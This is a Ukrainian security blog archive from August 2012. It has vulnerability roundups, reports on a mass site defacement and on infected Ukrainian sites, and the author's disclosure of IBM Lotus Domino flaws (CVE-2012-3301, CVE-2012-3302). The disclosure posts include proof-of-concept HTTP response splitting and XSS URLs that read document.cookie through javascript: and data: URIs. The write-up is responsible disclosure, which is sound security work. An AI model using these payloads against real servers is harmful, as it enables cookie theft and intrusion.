Архів за Серпень, 2012

Добірка уразливостей

17:20 29.08.2012

В даній добірці уразливості в веб додатках:

  • Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability (деталі)
  • Openconstructor CMS 3.12.0 ‘createobject.php’, ‘name’ and ‘description’ parameters Stored Cross-site Scrpting vulnerabilities (деталі)
  • Openconstructor CMS 3.12.0 ‘data/hybrid/i_hybrid.php’, ‘header’ parameter Stored Cross-site Scripting Vulnerability (деталі)
  • Openconstructor CMS 3.12.0 ‘id’ parameter multiple SQL injection vulnerabilities (деталі)
  • Symantec Web Gateway upload_file Remote Code Execution Vulnerability (деталі)
  • Dir2web3 Mutiple Vulnerabilities (деталі)
  • Joomla com_package - SQL Injection Vulnerability (деталі)
  • Libtasn1 vulnerability (деталі)
  • Joomla com_photo - SQL Injection Vulnerability (деталі)
  • Inout Mobile Webmail APP - Multiple Web Vulnerabilities (деталі)

HTTPRS та XSS уразливості в IBM Lotus Domino

23:53 28.08.2012

18.05.2012

У травні, 03.05.2012, під час пентесту, я виявив багато уразливостей в IBM Lotus Domino, зокрема HTTP Response Splitting та Cross-Site Scripting. Це четверта порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в IBM Lotus Domino.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

28.08.2012

CVE: CVE-2012-3301

HTTP Response Splitting (WASC-25):

http://site/servlet/%0AHeader:value%0A1

Cross-Site Scripting (WASC-08):

Спрацює в різних браузерах (у випадку Mozilla Firefox спрацює для версій до Firefox 3.0.9):

http://site/servlet/%0ARefresh:0;URL=javascript:with(document)alert(cookie)%0A1

Спрацює в усіх версіях Firefox, але без доступу до кукісів:

http://site/servlet/%0ARefresh:0;URL=data:html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B%0A1

Також для XSS атаки може бути використаний заголовок Location.

Cross-Site Scripting (WASC-08):

Атака можлива через data: і vbscript: URI.

http://site/mail/x.nsf/MailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B
http://site/mail/x.nsf/WebInteriorMailFS?OpenFrameSet&Frame=NotesView&Src=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Уразливі Lotus Domino 8.5.3 та попередні версії. Як деякий час тому мені повідомили з IBM, вони виправили дані уразливості в версії 8.5.4. Стосовно інших дірок в продуктах IBM, про які я повідомив їм, то вони ще працюють над їх виправленням. Також існує обхідний метод захисту від двох останніх XSS через спеціальні налаштування веб сервера (що IBM навела в своєму advisory).

Масовий взлом сайтів на сервері Unlim

22:49 28.08.2012

За період з 23.01.2012 по 24.07.2012 відбувся масовий взлом сайтів на сервері Unlim. Нещодавно я вже розповідав про інші масові взломи.

Був взломаний сервер української компанії Unlim. Взлом складався з серії взломів, перші з яких відбулися до, а інші відбулися після згаданого масового взлому сайтів на сервері VinNest.

Всього було взломано 164 сайти на сервері української компанії Unlim (IP 31.28.167.158). Перелік сайтів можете подивитися на www.zone-h.org. Серед них український державний сайт cnpfu.gov.ua.

З зазначених 164 сайтів 13 сайтів були взломані хакерами з TurkWebSecurity, 132 сайтів хакером Margu з TurkWebSecurity, 1 сайт хакерами з S.V Crew, 3 сайти хакером ByALT, 7 сайтів хакером uykusuz001, 2 сайти хакером nackamara, 2 сайти хакером ChatLak, 1 сайт хакерами з Turkish Energy Team, 1 сайт хакером MadRooT та 2 сайти були взломані хакером TheZero.

Враховуючи велику кількість сайтів на одному сервері та короткий проміжок часу для дефейсу всіх 145 сайтів, немає сумнівів, що вони були взломані хакерами з TurkWebSecurity через взлом серверу хостінг провайдера (всі інші дефейси проводилися під час взломів окремих сайтів). Коли через взлом одного сайта, був отриманий root доступ до сервера (через уразливості в програмному забезпеченні самого сервера) та атаковані інші сайти на даному сервері.

День народження

20:19 28.08.2012

Два дні тому в мене був день народження - мені виповнилося 29 років. З чим вас і себе поздоровляю :-) .

В зв’язку з цією подією, дарую вам свою композицію Addictive Sound з мого нового альбому Narcotic Sound.

Численні уразливості в Oracle Java

17:25 28.08.2012

Виявлені численні уразливості безпеки в Oracle Java.

Уразливі продукти: Oracle Java Runtime Environment, Java Web Start та JavaFX.

Виявлені численні пошкодження пам’яті, що дозволяють віддалене виконання коду.

  • Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability (деталі)
  • Oracle Java Web Start java-vm-args Command Argument Injection Remote Code Execution (деталі)
  • Oracle Java JavaFX Arbitrary Argument Remote Code Execution Vulnerability (деталі)
  • Oracle Java Web Start JNLP Double Quote Remote Code Execution Vulnerability (деталі)
  • Oracle Java Runtime Environment readMabCurveData Integer Overflow Remote Code Execution Vulnerability (деталі)

Уразливості в IBM Lotus Domino

23:53 27.08.2012

15.05.2012

Ще в березні 2008, під час пентесту, я знайшов чимало уразливостей в IBM Lotus Domino. Деякі з них IBM вже виправила, деякі ні, а деякі виправила неякісно.

І у травні, 03.05.2012, під час нового пентесту, я виявив багато уразливостей в IBM Lotus Domino (деякі старі та багато нових), зокрема Cross-Site Scripting та Information Leakage. Це перша порція уразливостей в Lotus Domino. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

27.08.2012

CVE: CVE-2012-3302

XSS (WASC-08):

Дана XSS в березні 2008 працювала наступним чином:

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=javascript:alert(document.cookie);//

З тих пір вектор атаки через javascript: URI був виправлений, але існує можливість атаки через data: і vbscript: URI.

https://site/help/lccon.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_client.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_designer.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E
https://site/help/help85_admin.nsf/Main?OpenFrameSet&Frame=Topic&Src=data:text/html,%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Leakage (WASC-13):

На сторінці https://site/domcfg.nsf, що доступна без аутентифікації, має місце витік інформації про конфігурацію веб сервера. Таку ситуацію я зустрічав на багатьох сайтах на Lotus Domino.

Уразливі Lotus Domino 8.5.3 та попередні версії. Як деякий час тому мені повідомили з IBM, вони виправили XSS уразливості в версії 8.5.4. Стосовно Information Leakage та інших дірок в продуктах IBM, про які я повідомив їм, то вони ще працюють над їх виправленням.

Інфіковані сайти №131

22:49 27.08.2012

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://help.km.ua - інфекція була виявлена 27.06.2012. Зараз сайт входить до переліку підозрілих.
  • http://piraeusbank.ua - інфекція була виявлена 01.07.2012. Зараз сайт не входить до переліку підозрілих.
  • http://4eyes.com.ua - інфекція була виявлена 09.07.2012. Зараз сайт не входить до переліку підозрілих.
  • http://nextgenmobile.com.ua - інфекція була виявлена 04.07.2012. Зараз сайт не входить до переліку підозрілих.
  • http://ferrino.in.ua - інфекція була виявлена 11.07.2012. Зараз сайт входить до переліку підозрілих.
  • http://xzone.org.ua - інфекція була виявлена 28.06.2012. Зараз сайт не входить до переліку підозрілих.
  • http://nlc.kiev.ua - інфекція була виявлена 28.07.2012. Зараз сайт не входить до переліку підозрілих.
  • http://layout.in.ua - інфекція була виявлена 10.08.2012. Зараз сайт входить до переліку підозрілих.
  • http://tdmu.edu.ua - інфекція була виявлена 21.07.2012. Зараз сайт не входить до переліку підозрілих.
  • http://nvk9.at.ua - інфекція була виявлена 06.08.2012. Зараз сайт не входить до переліку підозрілих.

Підміна DLL в Google Chrome

20:36 27.08.2012

Виявлена можливість підміни DLL в Google Chrome (DLL Hijacking).

Уразливі версії: Google Chrome 19.0.

Небезпечний виклик metro_driver.dll.

  • Google Chrome 19 metro_driver.dll mishandling (деталі)

Добірка уразливостей

17:22 27.08.2012

В даній добірці уразливості в веб додатках:

  • HP LoadRunner Running on Windows, Remote Execution of Arbitrary Code (деталі)
  • Blackboard Mobile Learn v3.0 - Persistent Web Vulnerability (деталі)
  • AVAVoIP v1.5.12 - Multiple Web Vulnerabilities (деталі)
  • ocPortal 7.1.5 <= | Open URL Redirection Vulnerability (деталі)
  • DoS via Integer underflow in OpenSSL (деталі)
  • Security Advisory in LedgerSMBv 1.3.20 and below: Denial of Service vulnerability (деталі)
  • Social Engine 4 Persistent XSS & Non-Persistent XSS (деталі)
  • Tekno.Portal v0.1b ‘link.php’ Blind SQL Injection Vulnerability (деталі)
  • strongswan security update (деталі)
  • Cross-Site Scripting (XSS) in Redaxo (деталі)

Уразливості в плагінах для WordPress №63

23:51 25.08.2012

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Chenpress, Cimy User Extra Fields та Site5 WordPress Theme. Для котрих з’явилися експлоіти. Chenpress - це новий rich-редактор для WP, Cimy User Extra Fields - це плагін для додання нових полей на сторінку реєстрації та в профіль користувача, Site5 WordPress Theme Email Spoofing - це експлоіт для різних тем Site5, що вразливі до автоматизованої розсилки спаму на довільні емайли.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.